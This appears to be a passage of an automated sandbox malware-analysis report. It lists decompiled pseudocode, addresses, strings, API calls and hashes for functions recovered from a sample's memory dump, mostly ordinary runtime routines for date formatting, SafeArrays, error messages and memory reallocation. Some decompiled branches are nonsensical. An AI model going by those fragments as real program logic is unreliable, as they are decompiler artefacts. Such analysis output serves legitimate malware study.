										E032A92B0(__ebp) = E032A9314(__ebp);
										__eflags =  *(__ebp - 0xc) - 3;
										if( *(__ebp - 0xc) > 3) {
											 *(__ebp - 0xc) = 3;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E032A9264( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 0xb:
										goto L0;
									case 0xc:
										L90:
										E032A92B0(__ebp) =  *(__ebp + 8);
										__eax =  *0x32dd818; // 0x9338ed8
										__eax = E032A95E8(__eax, __ebx, __edi, __esi, __fp0,  *(__ebp + 8));
										__eax = E032A9314(__ebp);
										__eflags =  *(__ebp - 0x16);
										if( *(__ebp - 0x16) != 0) {
											L93:
											 *(__ebp + 8) = 0x32a9d9c;
											__edx = 1;
											E032A9204(1,  *(__ebp + 8)) =  *(__ebp + 8);
											__eax =  *0x32dd830; // 0x932a6b8
											__eax = E032A95E8(__eax, __ebx, __edi, __esi, __fp0,  *(__ebp + 8));
											goto L109;
										}
										L91:
										__eflags =  *(__ebp - 0x18);
										if( *(__ebp - 0x18) != 0) {
											goto L93;
										}
										L92:
										__eflags =  *(__ebp - 0x1a);
										if( *(__ebp - 0x1a) == 0) {
											goto L109;
										}
										goto L93;
									case 0xd:
										L94:
										__eflags =  *0x32dd815;
										__eflags = __eax - 0x32dd815;
										 *__edi =  *__edi + __cl;
										__eflags =  *(__ebp - 0x75000000) & __dl;
									case 0xe:
										L97:
										__eflags =  *0x32dd820;
										__eflags = __eax - 0x32dd820;
										_t128 = __esi + __esi * 2 - 0x75;
										 *_t128 =  *(__esi + __esi * 2 - 0x75) + __dh;
										__eflags =  *_t128;
									case 0xf:
										L100:
										__esi =  *__edi;
										while(1) {
											L104:
											__eax =  *__edi;
											__eflags =  *( *__edi);
											if( *( *__edi) == 0) {
												break;
											}
											L105:
											 *__edi =  *( *__edi) & 0x000000ff;
											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
											if(__eflags != 0) {
												L101:
												 *__edi =  *( *__edi) & 0x000000ff;
												__eax = __al & 0x000000ff;
												asm("bt [0x32c9808], eax");
												if(__eflags >= 0) {
													 *__edi =  *__edi + 1;
													__eflags =  *__edi;
												} else {
													__eax =  *__edi;
													 *__edi = E032ABAC0( *__edi);
												}
												continue;
											}
											break;
										}
										L106:
										__eax =  *(__ebp + 8);
										__edx =  *__edi;
										__edx =  *__edi - __esi;
										__esi = E032A9204(__edx,  *(__ebp + 8));
										__eax =  *__edi;
										__eflags =  *__eax;
										if( *__eax != 0) {
											 *__edi =  *__edi + 1;
										}
										goto L109;
								}
							} else {
								__eflags = _t220 - 0x4d;
								if(_t220 == 0x4d) {
									__eflags =  *(_t264 - 0x1e) - 0x48;
									if( *(_t264 - 0x1e) == 0x48) {
										_t220 = 0x4e;
									}
								}
								L9:
								 *(_t264 - 0x1e) = _t220;
								goto L10;
							}
						} else {
							E032A9204(E032ABAA0( *_t261),  *((intOrPtr*)(_t264 + 8)));
							 *_t261 = E032ABAC0( *_t261);
							 *(_t264 - 0x1e) = 0x20;
							continue;
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t264 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t264 + 8)) - 0x108)) - 1;
					_pop(_t258);
					 *[fs:eax] = _t258;
					_push(E032A9D73);
					return E032A44C4(_t264 - 0x2c, 2);
				}
			}

0x032a9ad0
0x032a9ad0
0x032a9ad0
0x032a9ad0
0x032a9ad0
0x032a9ad1
0x032a9ad9
0x032a9aeb
0x032a9aed
0x032a9b22
0x032a9b27
0x032a9b29
0x032a9b5e
0x032a9b63
0x032a9b65
0x032a9ba6
0x032a9bab
0x032a9bad
0x032a9bec
0x032a9bf1
0x032a9bf3
0x032a9c32
0x032a9bf5
0x032a9bf6
0x032a9c18
0x032a9c1e
0x032a9c1e
0x032a9baf
0x032a9bb0
0x032a9bd2
0x032a9bd8
0x032a9bd8
0x032a9b67
0x032a9b67
0x032a9b6c
0x032a9b83
0x032a9b88
0x032a9b6e
0x032a9b72
0x032a9b77
0x032a9b7c
0x032a9b8e
0x032a9b91
0x032a9b91
0x032a9b2b
0x032a9b2b
0x032a9b30
0x032a9b32
0x032a9b32
0x032a9b40
0x032a9b46
0x032a9b49
0x032a9b49
0x032a9aef
0x032a9aef
0x032a9af4
0x032a9af6
0x032a9af6
0x032a9af6
0x032a9af9
0x032a9afd
0x032a9b02
0x032a9b04
0x032a9b0a
0x032a9b0d
0x032a9b0d
0x00000000
0x032a9d3d
0x032a9649
0x032a9653
0x032a965a
0x032a968a
0x032a968c
0x032a9694
0x032a9696
0x032a9698
0x032a9698
0x032a9698
0x032a969b
0x032a969f
0x032a96a1
0x032a96b3
0x032a96b6
0x032a96b9
0x032a96bc
0x032a9d2b
0x032a9d37
0x00000000
0x032a9d3c
0x032a96c2
0x032a96c9
0x00000000
0x00000000
0x00000000
0x032a9749
0x032a974a
0x032a9751
0x032a9757
0x032a975b
0x032a978d
0x032a975d
0x032a9775
0x032a977a
0x00000000
0x00000000
0x032a9798
0x032a97a0
0x032a97a6
0x032a97ab
0x032a97b1
0x032a97b7
0x032a97ba
0x00000000
0x00000000
0x032a97c5
0x032a97cd
0x032a97d3
0x032a97d8
0x032a97de
0x032a97e4
0x032a97e7
0x00000000
0x00000000
0x032a97f2
0x032a97fa
0x032a9803
0x032a9804
0x032a9804
0x032a9807
0x032a980d
0x032a9811
0x032a9815
0x032a9818
0x032a9809
0x032a9809
0x032a9827
0x032a982b
0x032a9832
0x032a980b
0x032a9841
0x032a9845
0x032a984c
0x032a9851
0x032a9809
0x00000000
0x00000000
0x032a9857
0x032a985e
0x032a9861
0x032a9862
0x032a9862
0x032a9865
0x032a9878
0x032a987c
0x032a9880
0x032a9883
0x032a9867
0x032a9867
0x032a98a0
0x032a98a3
0x032a98aa
0x032a9869
0x032a9869
0x032a9869
0x032a986a
0x032a98c7
0x032a98ca
0x032a98d1
0x032a986c
0x032a986c
0x032a986c
0x032a986d
0x032a98dc
0x032a98e0
0x032a98e5
0x032a986f
0x032a98f0
0x032a98f4
0x032a98f9
0x032a98fe
0x032a986d
0x032a986a
0x032a9867
0x00000000
0x00000000
0x032a9904
0x032a990c
0x032a9912
0x032a9916
0x032a99b3
0x032a99b3
0x032a99b3
0x032a99b6
0x00000000
0x00000000
0x032a991d
0x032a9920
0x032a9923
0x032a992a
0x032a9937
0x032a9937
0x032a993a
0x032a993d
0x032a9952
0x032a9952
0x032a9952
0x032a9955
0x032a995e
0x032a995e
0x032a9962
0x032a99b2
0x032a99b2
0x032a99b2
0x00000000
0x032a99b2
0x032a9964
0x032a9964
0x032a9969
0x032a996e
0x032a9970
0x032a9975
0x032a9977
0x032a99a3
0x032a99a3
0x00000000
0x032a99a3
0x032a9979
0x032a9979
0x032a997e
0x032a9983
0x032a9985
0x032a998a
0x032a998c
0x00000000
0x00000000
0x032a998e
0x032a998e
0x032a9993
0x032a9998
0x032a999a
0x032a999f
0x032a99a1
0x00000000
0x00000000
0x00000000
0x032a99a1
0x032a9957
0x032a9957
0x032a9957
0x032a995a
0x00000000
0x00000000
0x032a995c
0x00000000
0x032a995c
0x032a993f
0x032a993f
0x00000000
0x00000000
0x032a9941
0x032a9941
0x032a9941
0x032a9944
0x032a99a9
0x032a99a9
0x032a99ad
0x032a99ad
0x032a99af
0x00000000
0x032a99af
0x032a9946
0x032a9946
0x032a9946
0x032a9949
0x00000000
0x00000000
0x032a994b
0x032a994b
0x032a994b
0x032a994e
0x00000000
0x00000000
0x032a9950
0x00000000
0x032a992c
0x032a992c
0x032a9933
0x00000000
0x032a9933
0x032a992a
0x032a99bc
0x032a99bc
0x032a99c0
0x032a99c4
0x032a99c8
0x032a99ca
0x032a99cf
0x032a99d9
0x032a99de
0x032a99e0
0x032a99e0
0x032a99e0
0x032a99e0
0x032a99d1
0x032a99d1
0x032a99d1
0x032a99cf
0x032a99e5
0x032a99e9
0x032a99eb
0x032a99eb
0x032a99f2
0x032a99f6
0x032a99fa
0x032a99fd
0x00000000
0x00000000
0x032a9a08
0x032a9a10
0x032a9a16
0x032a9a1a
0x032a9a1c
0x032a9a1c
0x032a9a23
0x032a9a27
0x032a9a2b
0x032a9a2e
0x00000000
0x00000000
0x032a9a39
0x032a9a41
0x032a9a47
0x032a9a4b
0x032a9a4d
0x032a9a4d
0x032a9a54
0x032a9a58
0x032a9a5c
0x032a9a5f
0x00000000
0x00000000
0x032a9a6a
0x032a9a6b
0x032a9a71
0x032a9a75
0x032a9a8b
0x032a9a8f
0x032a9a94
0x032a9a77
0x032a9a77
0x032a9a7b
0x032a9a80
0x032a9a85
0x00000000
0x00000000
0x032a9a9f
0x032a9aa7
0x032a9aad
0x032a9ab1
0x032a9ab3
0x032a9ab3
0x032a9aba
0x032a9abe
0x032a9ac2
0x032a9ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x032a9c3d
0x032a9c44
0x032a9c48
0x032a9c4d
0x032a9c54
0x032a9c5a
0x032a9c5f
0x032a9c73
0x032a9c77
0x032a9c7c
0x032a9c87
0x032a9c8b
0x032a9c90
0x00000000
0x032a9c95
0x032a9c61
0x032a9c61
0x032a9c66
0x00000000
0x00000000
0x032a9c68
0x032a9c68
0x032a9c6d
0x00000000
0x00000000
0x00000000
0x00000000
0x032a9c9b
0x032a9c9b
0x032a9c9c
0x032a9ca1
0x032a9ca3
0x00000000
0x032a9cbe
0x032a9cbe
0x032a9cbf
0x032a9cc4
0x032a9cc4
0x032a9cc4
0x00000000
0x032a9cdd
0x032a9cdd
0x032a9cff
0x032a9cff
0x032a9cff
0x032a9d01
0x032a9d04
0x00000000
0x00000000
0x032a9d06
0x032a9d08
0x032a9d0b
0x032a9d0e
0x032a9ce1
0x032a9ce3
0x032a9ce6
0x032a9ce9
0x032a9cf0
0x032a9cfd
0x032a9cfd
0x032a9cf2
0x032a9cf2
0x032a9cf9
0x032a9cf9
0x00000000
0x032a9cf0
0x00000000
0x032a9d0e
0x032a9d10
0x032a9d10
0x032a9d14
0x032a9d16
0x032a9d1a
0x032a9d20
0x032a9d22
0x032a9d25
0x032a9d27
0x032a9d27
0x00000000
0x00000000
0x032a96a3
0x032a96a3
0x032a96a6
0x032a96a8
0x032a96ac
0x032a96ae
0x032a96ae
0x032a96ac
0x032a96b0
0x032a96b0
0x00000000
0x032a96b0
0x032a965c
0x032a966b
0x032a9678
0x032a967a
0x00000000
0x032a967a
0x032a965a
0x032a9d4b
0x032a9d53
0x032a9d56
0x032a9d59
0x032a9d6b
0x032a9d6b

Strings

AAA, xrefs: 032A9BE0
AMPM, xrefs: 032A9B52
AAAA, xrefs: 032A9B9A
AM/PM, xrefs: 032A9ADA
A/P, xrefs: 032A9B16

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID:
String ID: A/P$AAA$AAAA$AM/PM$AMPM
API String ID: 0-3831542625
Opcode ID: 29f050f6e90721a570f38c5b0997e168222395cd238ef54e84b7553925ec663b
Instruction ID: 374e6d23510053d287745d82430fc15d8ffa1e557d36daf9c53471ce185c664e
Opcode Fuzzy Hash: 29f050f6e90721a570f38c5b0997e168222395cd238ef54e84b7553925ec663b
Instruction Fuzzy Hash: 5E418B79624E0D9FDB41FB1ED804BAEB7E9AF48310F508056E5088F250DBB9D9C18B90

Uniqueness

Uniqueness Score: -1.00%

Function 032D0E80 Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

9, xrefs: 032D0ED1
+, xrefs: 032D0E9C
-, xrefs: 032D0EA1
-, xrefs: 032D0EA6
0, xrefs: 032D0ECC

Memory Dump Source

Source File: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID:
String ID: +$-$-$0$9
API String ID: 0-893461730
Opcode ID: 99786426fa04367196df5dcd6138f2c741ad56ee1871359df960091d0e0ec61b
Instruction ID: 3daf3c63d91c1edca7ab79e88fd57a6fddc4368a126aa819d1b5b4d6d323667c
Opcode Fuzzy Hash: 99786426fa04367196df5dcd6138f2c741ad56ee1871359df960091d0e0ec61b
Instruction Fuzzy Hash: CFF0C2167B621A5EE73AC43DCC403B6B78FDBC22A1F1CD56798C1C6261D5A5C9C182E4

Uniqueness

Uniqueness Score: -1.00%

Function 032AE1CC Relevance: 6.1, APIs: 4, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E032AE1CC(signed short* __eax) {
				char _v260;
				char _v768;
				char _v772;
				signed short* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if((_v776[0] & 0x00000020) == 0) {
					E032AE014(0x80070057);
				}
				_t43 =  *_v776 & 0x0000ffff;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 = _v776[4];
					} else {
						_v780 =  *(_v776[4]);
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L032AD234();
							E032AE014(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L032AD23C();
							E032AE014(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E032AE170(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E032AE140(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L032AD244();
						E032AE014(_v780);
						E032AE3C4(_v792);
					}
				}
				L15:
				_push(_v776);
				L032ACDCC();
				return E032AE014(_v776);
			}

0x032ae1d8
0x032ae1e8
0x032ae1ef
0x032ae1ef
0x032ae1fa
0x032ae208
0x032ae217
0x032ae235
0x032ae219
0x032ae224
0x032ae224
0x032ae244
0x032ae250
0x032ae253
0x032ae255
0x032ae256
0x032ae258
0x032ae25e
0x032ae260
0x032ae26f
0x032ae270
0x032ae27a
0x032ae27b
0x032ae280
0x032ae28b
0x032ae28c
0x032ae296
0x032ae297
0x032ae29c
0x032ae2b7
0x032ae2b9
0x032ae2ba
0x032ae2bd
0x032ae2bd
0x032ae25e
0x032ae2c6
0x032ae2c9
0x032ae2cb
0x032ae2cc
0x032ae2d2
0x032ae2d8
0x032ae2da
0x032ae2dc
0x032ae2df
0x032ae2e2
0x032ae2e2
0x032ae2e5
0x00000000
0x00000000
0x00000000
0x032ae2e5
0x032ae2e5
0x032ae2ec
0x032ae2f7
0x032ae2ff
0x032ae306
0x032ae30d
0x032ae30e
0x032ae313
0x032ae31e
0x032ae31e
0x032ae32c
0x032ae330
0x032ae336
0x032ae337
0x032ae347

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 032AE27B
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 032AE297
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 032AE30E
VariantClear.OLEAUT32(?), ref: 032AE337

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: 8aa00cc61b707ac15c9433f3790f772ad147275ad2ddf2cbfec09d81ee21ca74
Instruction ID: 8864035e1ebfaf0adfc2a999191fc89692768468d431ced1a7a2eb4bf9c7ce62
Opcode Fuzzy Hash: 8aa00cc61b707ac15c9433f3790f772ad147275ad2ddf2cbfec09d81ee21ca74
Instruction Fuzzy Hash: A3411C79A10B2A9FCB61DB5CCC90BD9B3BCAF48700F0541D5E649AB211DA70AFC58F61

Uniqueness

Uniqueness Score: -1.00%

Function 032AAD20 Relevance: 6.1, APIs: 4, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E032AAD20(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x32dd7f8; // 0x32a0000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E032AAD14(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E032A8070( &_v273, 0x104, E032ABC10( &_v534, 0x5c) + 1);
				_t74 = 0x32aaea0;
				_t86 = 0x32aaea0;
				_t83 =  *0x32a6a8c; // 0x32a6ad8
				if(E032A3850(_t87, _t83) != 0) {
					_t74 = E032A4964( *((intOrPtr*)(_t87 + 4)));
					_t69 = E032A8048(_t74, 0x32aaea0);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x32aaea4;
					}
				}
				_t51 =  *0x32da980; // 0x32a6874
				_t16 = _t51 + 4; // 0xffe9
				_t53 =  *0x32dd7f8; // 0x32a0000
				LoadStringA(E032A5874(_t53),  *_t16,  &_v790, 0x100);
				E032A363C( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E032A8590(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E032A8048(_v8, _t86);
			}

0x032aad20
0x032aad2c
0x032aad2f
0x032aad31
0x032aad3d
0x032aad4c
0x032aad76
0x032aad7c
0x032aad88
0x032aad8d
0x032aad93
0x032aad93
0x032aadb1
0x032aadb6
0x032aadbb
0x032aadc2
0x032aadcf
0x032aadd9
0x032aaddd
0x032aade4
0x032aaded
0x032aaded
0x032aade4
0x032aadfe
0x032aae03
0x032aae07
0x032aae12
0x032aae1f
0x032aae2a
0x032aae30
0x032aae3d
0x032aae43
0x032aae4d
0x032aae53
0x032aae5a
0x032aae60
0x032aae67
0x032aae6d
0x032aae89
0x032aae9c

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 032AAD3D
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 032AAD61
GetModuleFileNameA.KERNEL32(032A0000,?,00000105), ref: 032AAD7C
LoadStringA.USER32 ref: 032AAE12

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 91a019bc5890f39e555a4c7a4087cca8118670b39b6912714e9bfc34ff105b82
Instruction ID: a1ece7b17ad02668fb92e9324a6505caaf613884d2b2c1eaf63a2b437065753f
Opcode Fuzzy Hash: 91a019bc5890f39e555a4c7a4087cca8118670b39b6912714e9bfc34ff105b82
Instruction Fuzzy Hash: E041E875A60B589BDB21EB6CDC84BDAB7FCAF08701F0440E9A548AB251D7B49FC4CB50

Uniqueness

Uniqueness Score: -1.00%

Function 032AAD1E Relevance: 6.1, APIs: 4, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E032AAD1E(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_t105 = __fp0;
				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x32dd7f8; // 0x32a0000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E032AAD14(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E032A8070( &_v273, 0x104, E032ABC10( &_v534, 0x5c) + 1);
				_t75 = 0x32aaea0;
				_t89 = 0x32aaea0;
				_t85 =  *0x32a6a8c; // 0x32a6ad8
				if(E032A3850(_t92, _t85) != 0) {
					_t75 = E032A4964( *((intOrPtr*)(_t92 + 4)));
					_t69 = E032A8048(_t75, 0x32aaea0);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x32aaea4;
					}
				}
				_t51 =  *0x32da980; // 0x32a6874
				_t16 = _t51 + 4; // 0xffe9
				_t53 =  *0x32dd7f8; // 0x32a0000
				LoadStringA(E032A5874(_t53),  *_t16,  &_v790, 0x100);
				E032A363C( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E032A8590(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E032A8048(_v8, _t89);
			}

0x032aad1e
0x032aad2c
0x032aad2f
0x032aad31
0x032aad3d
0x032aad4c
0x032aad76
0x032aad7c
0x032aad88
0x032aad8d
0x032aad93
0x032aad93
0x032aadb1
0x032aadb6
0x032aadbb
0x032aadc2
0x032aadcf
0x032aadd9
0x032aaddd
0x032aade4
0x032aaded
0x032aaded
0x032aade4
0x032aadfe
0x032aae03
0x032aae07
0x032aae12
0x032aae1f
0x032aae2a
0x032aae30
0x032aae3d
0x032aae43
0x032aae4d
0x032aae53
0x032aae5a
0x032aae60
0x032aae67
0x032aae6d
0x032aae89
0x032aae9c

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 032AAD3D
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 032AAD61
GetModuleFileNameA.KERNEL32(032A0000,?,00000105), ref: 032AAD7C
LoadStringA.USER32 ref: 032AAE12

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: ee05c9f1972bc21dd3344a2e2f604197aad7eea2d183a4b176b3f521a5ec411a
Instruction ID: 6d313053003f8cd77abd42cdb2a991b336316f861ae5fec0b680ad7f43921c7c
Opcode Fuzzy Hash: ee05c9f1972bc21dd3344a2e2f604197aad7eea2d183a4b176b3f521a5ec411a
Instruction Fuzzy Hash: C6411A75A20B589BDB21EB6CDC84BDAB7ECAF08301F0440E5A548EB251D7B49FC4CB50

Uniqueness

Uniqueness Score: -1.00%

Function 032A1C6C Relevance: 5.3, APIs: 4, Instructions: 330
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E032A1C6C(signed int __eax, signed int __edx, void* __edi) {
				signed int _t58;
				signed int _t73;
				signed int _t80;
				signed int _t86;
				signed int _t94;
				signed int _t100;
				void* _t102;
				signed int _t111;
				signed int _t119;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				intOrPtr _t139;
				void* _t141;
				signed int _t143;
				signed int _t145;
				unsigned int _t146;
				signed int _t153;
				unsigned int _t154;
				intOrPtr _t157;
				void* _t160;
				intOrPtr _t168;
				intOrPtr _t170;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				void* _t182;
				unsigned int _t184;
				signed int _t190;
				signed int _t193;
				signed int _t195;
				signed int _t196;
				signed int _t198;
				void* _t202;
				signed int _t203;
				signed int _t204;
				void* _t205;
				signed int _t208;

				_t181 = __edi;
				_t166 = __edx;
				_t145 =  *(__eax - 4);
				_t196 = __eax;
				if((_t145 & 0x00000007) != 0) {
					__eflags = _t145 & 0x00000005;
					if((_t145 & 0x00000005) != 0) {
						__eflags = _t145 & 0x00000003;
						if((_t145 & 0x00000003) != 0) {
							__eflags = 0;
							return 0;
						} else {
							_t146 = _t145 - 0x18;
							__eflags = __edx - _t146;
							if(__edx <= _t146) {
								__eflags = __edx - _t146 >> 1;
								if(__edx < _t146 >> 1) {
									_t131 = __edx;
									_t58 = E032A1724(__edx);
									__eflags = _t58;
									if(_t58 == 0) {
										goto L61;
									} else {
										__eflags = _t131 - 0x40a2c;
										if(_t131 > 0x40a2c) {
											 *((intOrPtr*)(_t58 - 8)) = _t131;
										}
										E032A14A4(_t196, _t131, _t58);
										E032A1A8C(_t196, _t181);
										return _t58;
									}
								} else {
									 *((intOrPtr*)(__eax - 8)) = __edx;
									return __eax;
								}
							} else {
								asm("adc eax, 0xffffffff");
								_t133 = (0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx;
								_push(__edx);
								_t58 = E032A1724((0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx);
								_pop(_t168);
								__eflags = _t58;
								if(_t58 != 0) {
									__eflags = _t133 - 0x40a2c;
									if(_t133 > 0x40a2c) {
										 *((intOrPtr*)(_t58 - 8)) = _t168;
									}
									E032A1474(_t196,  *((intOrPtr*)(_t196 - 8)), _t58);
									E032A1A8C(_t196, _t181);
									return _t58;
								}
								L61:
								return _t58;
							}
						}
					} else {
						_t153 = _t145 & 0xfffffff0;
						_push(__edi);
						_t182 = _t153 + __eax;
						_t154 = _t153 - 4;
						_t136 = _t145 & 0x0000000f;
						__eflags = __edx - _t154;
						if(__edx > _t154) {
							_t73 =  *(_t182 - 4);
							__eflags = _t73 & 0x00000001;
							if((_t73 & 0x00000001) == 0) {
								L51:
								asm("adc edi, 0xffffffff");
								_t198 = ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166;
								_t184 = _t154;
								_t80 = E032A1724(((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166);
								_t170 = _t166;
								__eflags = _t80;
								if(_t80 == 0) {
									goto L49;
								} else {
									__eflags = _t198 - 0x40a2c;
									if(_t198 > 0x40a2c) {
